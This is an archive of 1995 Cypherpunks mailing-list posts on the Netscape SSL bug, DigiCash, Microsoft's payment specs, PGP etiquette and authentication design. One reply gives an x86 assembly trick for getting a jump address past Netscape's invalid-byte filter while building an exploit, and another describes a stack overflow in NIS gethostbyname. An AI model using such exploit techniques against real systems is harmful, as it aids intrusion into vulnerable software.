MIME-Version: 1.0
Content-Type: text/plain


DigiCash's BigMac wrote:

> Feel free to ask us the questions before publicly posting. It will 
> prevent misunderstandings and libel lawsuits.

Libel lawsuits for misunderstandings? 

Ridiculous. Libel threats are very rare on the CP list,
it's one of the list's features. (I can't recollect any such
threat since a well-known Nym was intimidated by LD, more
than a year ago - and that Nym eventually saw the light.)

Go sue yourself.

Mats 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 27 Sep 95 07:57:21 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Status of Netscape Bug Exploit (suggestions needed)
Message-ID: <Pine.3.89.9509271529.A7869-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Couldn't you either create the address in a register, and then do an 
indirect jump through the register, or push it onto the stack and do a 
ret ? You could do something like 

	mov ecx, address + 01010101
	sub ecx, 01010101
	jmp [ecx]

I'm not certain of the format for BSDI assembler, but I presume that's 
possible. You could modify the value you add and subtract to make sure 
there are no netscape-invalid bytes in the compiled code.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 27 Sep 95 14:02:59 PDT
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Hack Microsoft NT C2 Rating?
In-Reply-To: <199509261856.LAA24022@ix6.ix.netcom.com>
Message-ID: <9509272102.AA21900@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain




>I'm more surprised by the rating since the Orange Book is basically
>for non-networked systems; Red Book rating is _much_ harder, unless
>the NSA's taking a different view of trustability of software encryption 
>for authentication purposes than they used to.

I'm a little sceptical as to the relevance of C2. It is a set of criteria that 
is now very old and concerns military security where people can be told what to 
do. One way in which securoty systems often fail is in the security structure 
being so suffocating that people have to poke air holes in it so they can 
breathe.

I think that c2 is possibly the limit of orange/red bookishness that is 
reasonable to work to. It is not a trivial level of security however, UNIX 
despite all the claims has never been shipped as C2 secure as standard by a 
mainstream vendor. Even requirements involving trivial effort but which are 
extreemly important such as the writing of a users security guide have never 
been taken seriously on any of the UNIX platforms on which I have worked.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 27 Sep 95 15:02:29 PDT
To: cypherpunks@toad.com
Subject: Re: Insecurity in WWW oriented security
In-Reply-To: <9509261509.AA10554@vampire.science.gmu.edu>
Message-ID: <44ceto$7qo@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


[Story about hospital wanting to use "secure" Netscape deleted.]

On a similar note, just after the unssl announcement, I got email from
someone who works in network security at the Pentagon, saying that
users in his domain were "expressing their desires to use Netscape
to do some sensitive things."

I wonder if anyone's packet-sniffing the Pentagon?

   - Ian "I mean _besides_ the NSA."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 27 Sep 95 10:23:57 PDT
To: cypherpunks@toad.com
Subject: Microsoft & new Internet Security specs
Message-ID: <199509271723.NAA16512@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.prnewswire.com/cnoc/story/569463/18018

> [Company News on Call] [Return to Company Listing]
> [Return to Headlines]
> 
>      MICROSOFT PUBLISHES SPECIFICATIONS DESIGNED TO HELP
>      IMPROVE SECURITY ON THE INTERNET
> 
>     ATLANTA, Sept. 27 /PRNewswire/ -- Microsoft Corp. (Nasdaq: MSFT)
> today announced the publication of two specifications that address key
> Internet security issues.  Software designed with these specifications
> will enable developers to incorporate improved security technology into
> their applications, giving businesses and consumers confidence that
> their transactions and communications will be secure.
>     The two specifications -- Secure Transaction Technology (STT) and
> Private Communication Technology (PCT) -- were published today on the
> Internet.  To help encourage widespread adoption of STT and PCT,
> Microsoft is making the specifications available at no charge to all
> software developers, businesses, card brands and financial institutions
> that want to create STT-compliant and PCT-compliant applications.  Both
> can be found on the Microsoft home page (http//:www.microsoft.com).
>     "We set out a year ago to build STT, a security system that meets
> the strict requirements of the payment-card industry.  STT's design uses
> sophisticated cryptographic techniques to help protect and authenticate
> consumers, merchants and financial institutions that use bank cards to
> conduct business on the Internet," said Craig Mundie, senior vice
> president of the consumer systems division at Microsoft.  "After doing
> so, we felt we could also apply our expertise to the Internet's need for
> general-purpose security.  PCT builds upon Secure Sockets Layer by
> incorporating strong authentication and other technologies we developed
> for STT."
>     STT, jointly developed with Visa International, is supported by the
> Internet Shopping Network, RSA Data Security Inc. and Spyglass Inc.  The
> PCT specification is supported by Cylink Corp., FTP Software Inc.,
> Internet Shopping Network, NetManage Inc., OpenMarket Inc., Spyglass
> Inc. and Starwave Corp.
>     "We cannot afford to have doubt cast over the ability to conduct
> business on the Internet," said Marc Miller, executive vice president of
> marketing and business development for Spyglass Inc.  "We applaud
> Microsoft for approaching the security issue as it should be approached
> -- in an open forum within the Internet community.  Our whole business
> model is based on partnerships.  We're happy to be working with
> Microsoft to provide an open, specifications-based solution to help
> ensure the viability of this exciting new medium."
>     The Secure Transaction Technology specification, jointly developed
> by Microsoft and Visa, is designed to provide a secure method for
> handling credit-card transactions across private and public networks.
> By providing a technology that can be completely integrated with the
> current bank-card system, STT will serve as a reliable payment system
> for software providers to incorporate into their products.  STT also
> preserves the branded transaction relationships that merchants and
> financial institutions have with their customers.
>     The Private Communication Technology specification is designed to
> secure general-purpose business and personal communications on the
> Internet.  PCT includes features such as privacy, authentication and
> mutual identification.  As a secure communications technology, PCT
> builds on the earlier advances embodied in Secure Sockets Layer (SSL).
> PCT enhances SSL by separating authentication from encryption.  This
> means that PCT allows applications to use authentication that is
> significantly stronger than the 40-bit key limit for encryption allowed
> by the U.S. government for export.
>     "The Internet Shopping Network is committed to providing the most
> secure online shopping environment possible," said Boris Putanec, vice
> president of engineering for the Internet Shopping Network.  "STT
> delivers one of the highest levels of security and authentication for
> shopping transactions, boosting electronic commerce."
>     Microsoft plans to incorporate both STT and PCT into its own
> products, such as the Microsoft(R) Internet Explorer 2.0, which ships
> with the Window(R) operating system, and is encouraging other software
> developers to do the same.
>     The specifications released by Microsoft include use of encryption
> capabilities based on technology from RSA Data Security Inc.
>     Founded in 1975, Microsoft is the worldwide leader in software for
> personal computers.  The company offers a wide range of products and
> services for business and personal use, each designed with the mission
> of making it easier and more enjoyable for people to take advantage of
> the full power of personal computing every day.

>     Microsoft is either a registered trademark or trademark in the
> United States and/or other countries.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 27 Sep 95 15:47:24 PDT
To: "cypherpunks@toad.com>
Subject: Re: Security Update news release
Message-ID: <199509272302.SAA03139@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: David E. Smith * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

> >Do the new versions use PGP's randseed.bin? If Netscape even only looks
at
> >data used to keep PGP secure,  Netscape will be banned from my computer
> >and every computer I am responsible for. -- For good.
> 
> This is the second person who has expressed this sentiment. I don't
> understand it. If you believe that the possibility of randseed.bin
> getting out is dangerous, then why do you leave it online? Do you
> really trust every piece of software you run, every piece of software
> that can possibly access your machine over the net, to not look at
> that file?

I'm still running MSDOS, so I suppose net connectivity isn't much
of an issue :)  At any rate, I set my randseed.bin to a length of 0
and then made in un-writable, so that new random bits have to be
generated every time.  It's not too much of a trouble for me;
most of my PGP use is just signing messages to certain interested
parties.  How would Netscape handle the fact that there aren't any
random bits here?

Dave "old bits, new bits, red bits, blue bits"
- --
David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(314)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
Opinions this ludicrous are mine.  Rational ones will cost you.
Heh

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGnQnwwyfvCScyE5AQHzIQQAklOHwzKJY9P2DqAvdf4Rn1aZUNcqW3bz
rk/FCrQP19WxqyTsO7RcRQ6q5ziwqU4qbMu+Xyci2qT0wEnOKFYhauLgLd0xxttA
7sqX9pEQVbLN9KCGz5AqFwDNlqVcdMqu0yo8s5gprmCFxDh0hXzt880rNn8tP6Id
ErrhJ2NToZo=
=0KRe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peace@BIX.com
Date: Wed, 27 Sep 95 14:51:06 PDT
To: cypherpunks@toad.com
Subject: Schnorr patent
Message-ID: <9509271751.memo.21703@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Now that PKP is dead, does anyone know how to contact C. Schnorr about his patent?

Peace ..Tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Wed, 27 Sep 95 17:58:32 PDT
To: cypherpunks@toad.com
Subject: Re: First Payments WG Meeting Announcement
Message-ID: <v02110100ac8fa1a77e94@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


FYI-  the FSTC E-payment Working Group meeting is happening at the W3 meeting
on the day before the meeting itself. The meeting is being held at the OSF
facilities.

>The World Wide Web Consortium is holding a Workshop on payments. The workshop
>is intended to be a small, technically oriented meeting of its payments working
>group. Although it is a members only event I am willing to listen to special
>pleading, alternatively companies may wish to join the consortium at our
>extreemely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for
>details.
>
>--
>Phillip M. Hallam-Baker            Not speaking for anoyone else
>hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
>Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!
>
>ANNOUNCE: First W3C Payments WG Meeting, October 11
>
>----------------------------------------------------------------------------
>
>What: 1st W3C Payment WG Meeting
>
>Where: MIT EECS, Grier Room 34-401 (subject to change)
>
>When: Wednesday October 11, 9am - 5pm
>
>Who: W3C Member Representatives ONLY
>
>URL: First W3C Payments WG Meeting
>
>W3C is making progress on supporting electronic payments on the web. This WG
>Meeting has been called to foster discussion and feedback between W3C and
>its members. Discussion will focus on proposals to the W3C for payment
>protocols, interfaces, and e-commerce support.
>
>The agenda for the electronic payment workshop is still being settled. At
>the current time we have confirmed presentations by VISA, IBM, W3C, and the
>Financial Services Technical Consortium (FSTC). Additional invitations have
>been issued, and suggestions for additional presentations would be welcome.
>Contact Phillip Hallam-Baker (hallam@w3.org) or Jim Miller (JMiller@w3.org)
>with suggestions.
>
>There is a separate W3C Security WG Meeting at MIT on Tuesday, October 10th.
>Contact Rohit Khare for details (khare@w3.org)
>
>To RSVP for the Payments WG Meeting, email the coordinator, Phillip
>Hallam-Baker (hallam@w3.org) or call 617/258-5967 by 5 October. This
>workshop is aimed at technologists; please include a brief description of
>any relevant payments work you or your organization are involved in.
>
>This is a preliminary announcement of the date and time only. We have
>arranged for hotel rooms at the Kendall Square Mariott. To qualify for the
>MIT discount, notify Susan Hardy (susan@w3.org).
>
>For a review of the Consortium's plans, see W3C's report on Electronic
>Payment Schemes and the Third W3C Security Workshop.

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 27 Sep 95 15:17:52 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: [Q] Checkfree Wallet
Message-ID: <199509272217.SAA22791@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm writing about security and the Internet and in particular about
the Netscape bugs. 

I'm interested if anyone know technical details about the Checkfree
Wallet system. Have they made code publically available, etc.

BTW. THe Wallet system is supposed to be using ~768 bit public key
system and it is reported to exportable. All decyption is done at
Checkfree Corp. Users encode only the credit info, the WWW server
signs the file and forwards it to Checkfree who will decrypt and
process the credit card data.

I've been told no credit card info is kept on any servers except for
machines inside of Checkfree's network and that keep credit card
numbers on file there.

Please let me know if you know anything. Unless other indicate
any information will be assume for publication. Background information
is welcome as well.

/hawk 	habs@panix.com

	writing for NetGuide Mag.


-- 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Wed, 27 Sep 95 19:25:48 PDT
To: cypherpunks@toad.com
Subject: Information, We want information
Message-ID: <v02110101ac8fb5e74078@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


I an immediate need of info on the liabilities of BSD type systems, and in
particular the BorderWare products.

I heard that in the BorderWare product itself, there are several  recently
discovered potential "holes"...

I have a particular interest in both the Attack MO against the BSD
platforms in general and the Border products in particular...

Please do not send the reply to the lists but to me personally
(todd@lgt.com). I will summarize if I get enough info to be worth the
effort.

Any comments?

Thanks In Advance...
Todd Glassey
todd@lgt.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 27 Sep 95 18:29:14 PDT
To: cypherpunks@toad.com
Subject: weak links in the cyberbucks demo (was: weak links in DigiCash system)
Message-ID: <199509280129.TAA07801@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Originally to Marcel van der Peijl at DigiCash.


- ------- Forwarded Message

To: "Marcel van der Peijl" <bigmac@digicash.com>
Subject: weak links in the cyberbucks demo (was: weak links in DigiCash system)
Date: Wed, 27 Sep 1995 19:20:16 -0600
From: Bryce Wilcox <bryce@colorado.edu>


- -----BEGIN PGP SIGNED MESSAGE-----

Marcel--  I'm sorry that my comments upset you so much, but I do not 
believe that they were unwarranted.  It is true that the cyberbucks demo 
is insecure in some ways, such as using insecure e-mail.  On the other 
hand your response that the demo is not about e-mail, it is about E-cash, 
and that you don't have the manpower to invest in making those extraneous 
things secure, is a good one and I am satisfied.


The only thing I wish I had done differently was to make the title of the
message "weak links in cyberbucks demo".  There are, as far as I am aware, no
weak links in the DigiCash system.


I sincerely wish your company the best success, although I fear that
MicroSoft and Visa and the like will successfully market inferior systems by
use of their money and mindshare.  In fact, a large part of the reason that
I chose to sell BAP via a cybershop was to draw more attention to Ecash.  
I hope it is working.  I guess if you have about a two-week queue for free
cyberbucks, then maybe in a week I will get a whole lot of BAP purchases.
:-)


Regards,

Bryce


signatures follow



To strive, to seek, to find and not to yield.

bryce@colorado.edu   http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMGn3/fWZSllhfG25AQEZegP/XMmoGuATQpfhBtNuIT/yUwFv9IL0+OXe
auH1eMJ8d1PoWPJthrou7THpxkkOzJ0iV+GrTKS0n1dSQ2REbwk27SHsXce3LAEX
JIy3rsKywTYuswH6aS361uaymPWusMr6ZhAeaegxnoSWnY3/Z2RlPCxDnhpROBsk
vKgIf1mt8ww=
=TRMS
- -----END PGP SIGNATURE-----

- ------- End of Forwarded Message


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMGn6PfWZSllhfG25AQHuUQQAtwozCJKKxq4dlOn6SpDHs5tGbhxRWozd
NUjDxffgCL2FAINsrfKR9hOXqXztYD1hQGJ4jBE+uw6sD5gGYrGct5RVuG9X51Ua
HTceFbqJHd6mc3ISTMusQwQDt9kJ2DmGXqV8nt4yI20uiPKZKDVizhAqg900xqGs
78NeZuvZ5cg=
=3SxM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 27 Sep 95 20:22:56 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <v02120d06ac8f74e7796e@[199.2.22.120]>
Message-ID: <199509280317.UAA05182@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> As for objections about how worthwhile this is, it's pretty clear
> that a patch will be available for this problem before we can finish
> and publicize an exploit.

	Which makes an exploit all the more useful. If an exploit was
published well before a patch would be available, people would make
accusations that the exploit publisher was aiding
vandalism. (Warranted or not, 8lgm gets these accusations, etc.)
Publishing the exploit after the patch is available means more of an
incentive to go get the patched version. I for one, haven't picked up
the patched netscape yet.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Wed, 27 Sep 95 20:21:08 PDT
To: cypherpunks@toad.com
Subject: Re: Microsoft & new Internet Security specs
Message-ID: <v03003502ac8fc289516f@[199.254.15.47]>
MIME-Version: 1.0
Content-Type: text/plain


> [Company News on Call] [Return to Company Listing]
> [Return to Headlines]
>
>      MICROSOFT PUBLISHES SPECIFICATIONS DESIGNED TO HELP
>      IMPROVE SECURITY ON THE INTERNET
>
>     ATLANTA, Sept. 27 /PRNewswire/ -- Microsoft Corp. (Nasdaq: MSFT)
> today announced the publication of two specifications that address key
> Internet security issues.
[ blah, blah, blah ]
> Both can be found on the Microsoft home page (http//:www.microsoft.com).
>
I command-clicked on that URL, and my mail program asked me what program I
wanted to use to resolve "http//" URLs :-)

The correct URL is, of course, <http://www.microsoft.com>
-- Marshall

Marshall Clow
mclow@coyote.csusm.edu

I'm an engineer. I make slides no one can read. Sometimes I eat donuts.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcel van der Peijl <bigmac@digicash.com>
Date: Wed, 27 Sep 95 12:24:37 PDT
To: asgaard@sos.sll.se
Subject: Re: Re: NO weak links ...
In-Reply-To: <Pine.HPP.3.91.950927144813.22239A-100000@cor.sos.sll.se>
Message-ID: <199509271924.UAA00338@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


Mats Bergstrom <asgaard@sos.sll.se> wrote:
>Libel lawsuits for misunderstandings? 
>
>Ridiculous. Libel threats are very rare on the CP list,
>it's one of the list's features. (I can't recollect any such
>threat since a well-known Nym was intimidated by LD, more
>than a year ago - and that Nym eventually saw the light.)

Oh come on. Don't take everything so seriously. This was not an explicit 
and/or real threat.

>Go sue yourself.
Suing myself is as unlikely as suing someone else. I am not American and 
do not know my lawyer on a first-name basis. You as fellow-European 
should understand this.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Sep 95 20:38:34 PDT
To: cypherpunks@toad.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <ac8f659c0302100475d5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:33 PM 9/27/95, Travis Corcoran wrote:

>I'm not sure whether you're objecting to someone asked for your key,
>or the fact that they did it through a semi-automated process.

If you go back to my original message you'll see that I was discussing the
rising number of spams, advertisements, and "automatically-generated"
posts.

What I call a robo-warning was this:

"  P.S.  This mail was composed by my mailreading sftwr, which
        automatically scans incoming mail, looking for failed keyserver
        requests, and prompts me whether it should automatically send this msg
        on my behalf.  If there is a bug w this sftwr (for example, you never
        PGP sign your msgs, so this entire msg makes no sense), or if you're
        interested in the software itself (mail-secure.el: a package in lisp
        for emacs; this is just one of the many crypto/privacy related things
        it does) please mail the author of this package ( tjic@openmarket.com)
        for details.


As to whether I needed to respond to your robo-warning about how your
automatic scan of incoming mail produced some kind of Signature Failure
Condition Red at your end, I just ignored your message. (As others will
attest, when people ask me for my key in a non-automated way, I usually
send it to them. I often regret this, as they then send me PGP-encrypted
mail with innocuous contents---the same reason PRZ hates to get PGP mail.)

My _overall_ point was not to attack Travis C., who I don't think I even
mentioned by name, but to point out that great care must be taken in
running automated mail-response programs (including "vacation" programs,
"I'm away from my terminal" messages, and these kinds of automated PGP
messages).

Finally, since Travis is making a fairly big deal over my citing of his
post (though anonymously, as I recall), I'd like to see the post he claims
I signed. If it has a PGP signature, it's probably an obvious spoof or
satire.


>If anyone has a constructive suggestion as to how this mail could be
>changed to convey more information or to be less "threatening", please
>mail me.

Simple, don't bother to ask in the first place. Or ask informally, in
ordinary English. Skip the "This mail was composed by my mailreading sftwr,
which automatically scans incoming mail, looking for failed keyserver
requests..." nonsense.

On a list with well over 1000 people, I don't need some fraction of them
running their own "key etiquette agents" inspecting my posts for
conformance to their preferences.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Wed, 27 Sep 95 20:51:49 PDT
To: cypherpunks@toad.com
Subject: Patch release of Netscape available
Message-ID: <14494.812260307@ghoti.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On ftp://ftp.netscape.com/pub/netscape, you can find the new UNIX,
Macintosh and Windows executables. Note that these executables only
support 40-bit RC4. We are working out a mechanism to be able to
upgrade the 128-bit versions that is acceptable to the U.S.
government.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Wed, 27 Sep 95 21:02:43 PDT
To: cypherpunks@toad.com
Subject: NIS library code exposure
Message-ID: <14539.812260953@ghoti.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Once again I speak for myself and not Netscape.

While investigating one of the crashes we ended up decompling some of
the code in the C library. It turns out that in some UNIX systems, the
code in gethostbyname_yp will copy the hostname argument onto a stack
local buffer. That buffer appears to be of size MAXHOSTNAMELEN. [This
is very efficient code at destroying the stack: it does not use strcpy
or sprintf; there is an inline loop copying characters until it finds a
NUL.]

An unstated (in any documentaton I could find) limitation on calls to
gethostbyname is that the "name" parameter must be a limited size
string for it to work at all. I suspect this bug has been in the NIS
(nee YP) code for some time.

Do you have any daemons that run as root and do networking? Are you
sure that all of them check the length of the host name before passing
it to gethostbyname?

[Avoid the fencepost error: MAXHOSTNAMELEN is really the size of the
buffer and not the maximal string length. You need room for the
trailing NUL.]

We have not looked into the networking libraries that are typically
found on a PC or Macintosh. The exposure may also be present there.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Sep 95 20:56:07 PDT
To: cypherpunks@toad.com
Subject: Re: [ PROPOSED NEW STANDARD ] "I-like-encrypted-mail" tag
Message-ID: <ac8f6b4b04021004cba0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:21 PM 9/27/95, Travis Corcoran wrote:
>Summary:
>
>        This message tosses out an idea for conveying within an { email |
>        usenet } message the datum "the author of this message prefers to
>        receive PGP encrypted communications" in a standard machine-readable
>        form.

I don't dislike this idea, so my comments here are only possible routes for
those who want to get PGP-encrypted mail.

First, I think Hal Finney was offering at one time to remail the list to
anyone in encrypted form (encrypted on his machine(s) to their PGP key, of
course). This would increase the volume of PGP mail, of course.

Second, others could make the same offer.

Third, remailers could be used.

Now encrypting a public list doesn't do much, of course, but it does
increase the amount of encrypted traffic.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 27 Sep 95 21:13:48 PDT
To: cypherpunks@toad.com
Subject: Re: Using sound cards to accelerate RSA?
Message-ID: <ac8f6da90502100459f8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:39 PM 9/27/95, Simon Spero wrote:
>Somebody mentioned the possibility of using the a/d stage of a sound card
>as a source of random bits, and that brought a thought back to mind:
>given that a lot of sound cards are now shipping with DSP chips on board,
>has anyone written any code that uses the cards DSP to accelerate RSA
>processing?
>
>Maybe there's a mass market market for a crypto-blaster- an RNG, 3 or 6
>DES chips, and a DSP. It would make for a killer linux based SHTTP server...

But I don't think Soundblaster-class DSP performance is especially
impressive compared to where the market is going with Pentiums. (AMD and
Cyrix have both announced plans to exit the 486 market as rapidly as they
can--and of course Intel has been doing that for some time already.)

It made more sense 2-3 years ago, and a couple of people were talking about
finding ways to use modems and DSP cards to accelerate crypto functions.
(Paul Rubin, for example, was looking at Trailblazer modems...)

Another problem with such solutions is that they often get marginalized, or
left on the sidelines. This has to do with lots of things, including the
percentage of people who have various add-on cards, the power of their main
CPUs, etc. (Many things to touch on here. Apple used a DSP chip in their
840av and 660av models, but various problems in supporting these chips
cropped up, and Apple phased them out in favor of PPC-only configurations.
Intel is pushing "native signal processing" to both sell faster CPUs and
ease the programming efforts in supporting DSP chips. Time will tell.)

For other reasons, software solutions are generally preferable to
hardware-dependent solutions.

Finally, few crypto applications seem to be limited very much by speed at
this time. Audio and video apps, of course, put a strain on processing
power, and this is where DSP capabilities make the most difference,
probably.

Finally (for real), the effort in supporting DSP chips could probably
better be spent elsewhere, given the small effects of a slight increase in
speed. Getting PGP more widely integrated into popular programs would seem
to me to be a bigger win than in reducing the time to encrypt a message
from 3.2 seconds to 1.9 seconds.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 27 Sep 95 21:42:07 PDT
To: tjic@OpenMarket.com
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
Message-ID: <9509280438.AA23997@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	but the key was not there.  Please mail me your key.  Thank you.
> 
> 
> If anyone has a constructive suggestion as to how this mail could be
> changed to convey more information or to be less "threatening", please
> mail me.
> 
Sure, I found the above offensive.  It comes across in exactly the same
tone as a cop saying, "Please step away from the car."  I know it's silly,
but sometimes Please just isn't enough.  The simple change:

      but the key was not there.  Could you please mail me your key?  Thanks.

works miracles:)  The tone on the rest of it was nice.  You have to be careful
with imperatives.  They usually sound mean...even with a please at the front.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Wed, 27 Sep 95 13:48:36 PDT
To: cypherpunks@toad.com
Subject: Sorry or something
Message-ID: <199509272048.VAA02445@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


In case it was not clear: my earlier post really was not a lawsuit 
threat. It seems it was (mis)interpreted this way by some people.

Also, the original author did not post the article but someone he 
sent it to. I'm sure the author did not intend to post the text as is 
but first give us a fair chance of defending ourselves.

#include <stddisclaimer.h> 
"My opinions and reactions do NOT represent the official DigiCash 
standpoint."

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 27 Sep 95 22:02:04 PDT
To: cypherpunks@toad.com
Subject: Looking for advice.
Message-ID: <9509280458.AA24011@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


For two programs communicating via TCP/IP and exchanging authentication
information, I want to make sure that the authentication info, (user's
name and password,) doesn't pass in the clear.  I can think of a few
ways to handle this.  

1) Encrypt via shared key using symetric encryption.
   This works but key management is a problem.
2) Encrypt via public keys using public key encryption.
   There's licensing issues, and how do you generate public and private
   pairs for all of the programs?  That could be a lot of primes!
3) The "server" could keep user names and passwords stored as hashed values.
   That way the "client" could do a hash (MD5?) before sending it.
   This has the drawback of the server not having access to the unhashed
   values...if it needs that access this method won't work.

What are other possibilities?  What are the answers to my questions and
issues above?  Can you help?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
